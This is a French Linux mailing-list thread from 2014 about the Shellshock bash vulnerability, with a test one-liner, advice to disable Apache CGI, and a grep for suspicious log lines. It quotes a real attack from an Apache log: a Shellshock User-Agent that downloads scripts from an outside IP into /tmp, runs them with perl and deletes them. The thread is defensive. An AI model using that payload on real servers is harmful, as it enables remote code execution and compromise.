[Linux] Nouvelle faille de sécurité majeure ?

François DREYFÜRST francois.dreyfuerst@::1
Mar 30 Sep 08:15:53 CEST 2014 

Coucou à tous
> Le 29/09/14 09:49, François DREYFÜRST a écrit :
>> Au fait, le particulier que je suis, à part suivre scrupuleusement les
>> mises à jour de ma Debian (au passage, je commence à soupçonner que la
>> présence du paquet bash parmi ceux qui étaient à mettre à jour récemment
>> n'est pas fortuite), doit-il prendre des précautions particulières ?
>
> Vérifier que les mises à jour sont faites : pour toutes les machines, 
> voir si ce qui suit renvoie "This device is vulnerable"
>
> env x='() { :;}; echo This device is vulnerable'  bash -c "echo 
> Testing vulnerability"

Ça s'exécute en  tant que root ?

>
> -> Mon mac est touché...
>
> Comme d'habitude, supprimer tout ce qui ressemble à un service inutile 
> accessible de l'extérieur.

Perso, lorsque j'ai installé ma Debian, j'ai décoché les groupes de 
paquets de la famille « serveur » ... c'est plutôt bon, ou bien ?

>
> Et Debian est un bon choix, puisque (si j'ai bien compris ce que je 
> répète), le shell par défaut n'est PAS bash (contrairement à bien 
> d'autres distros).

Au passage, comment vérifier quel shell est actif ?

>
> J'ai vu qu'il était fortement conseillé de virer les CGI sur Apache 
> (a2dismod cgi). Je viens de le faire, j'ignore si ça va avoir un 
> impact. Mon site perso (non critique) supporte bien.
>
> Le danger est réel : j'ai vu passer exactement ça dans mes logs apache :
> /var/log/apache2/access.log:173.45.100.18 - - [29/Sep/2014:09:27:52 
> +0200] "GET /cgi-bin/hi HTTP/1.0" 403 399 "-" "() { :;}; /bin/bash -c 
> \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji 
> http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf 
> /tmp/ji*\""
>
> (voir :
> http://www.heise.de/security/news/foren/S-Bot-download/forum-286100/msg-25871507/read/ 
> )
>
> -> Si vous avez un apache, vérifiez que personne n'est venu tester 
> chez vous :
> grep \} /var/log/apache2/*log
>
> Si vous ne voyez rien, le pirate a peut-être juste bien nettoyé ses 
> traces :-)
>
>
> > Je
>> rappelle que mon ordi est, sur un cycle de 24h, bien plus éteint (hors
>> tension) qu'actif ; en revanche, pour l'instant mon modem-routeur est
>> allumé H24, dans la mesure où la connexion est partagée avec mon père.
>
> Si les machines n'ont pas de port ouvert sur le net, je dirais que y a 
> pas grand chose à craindre. Mais y a de quoi devenir parano en ce moment.

Voir ce que je disais plus haut : en principe, j'ai fermé ce qui doit 
l'être, avec le pare-feu FireStarter qui tourne sur ma bécane (en aval 
du routeur) ; l'autre ordi branché sur le routeur tourne en Windows ...

>
> 20 ans qu'il est là, ce bug, 20 ans ! Combien d'autres de ce calibre 
> existent ??
>
>
Oui, comme tu dis, entre ça, Heartbleed et d'autres bugs éventuellement 
encore à venir, il y a de quoi virer parano ET se demander si les 
logiciels libres sont aussi sûrs que leurs promoteurs le disent.
J'avais découvert l'info sur le site du journal berlinois « die 
Tageszeitung » http://www.taz.de , sorte d'équivalent allemand de notre 
« Libé » ; dans leur article, ils disent sans détour que sur ce coup, 
les logiciels libres en prennent un coup question crédibilité.

FD

Plus d'informations sur la liste de diffusion linux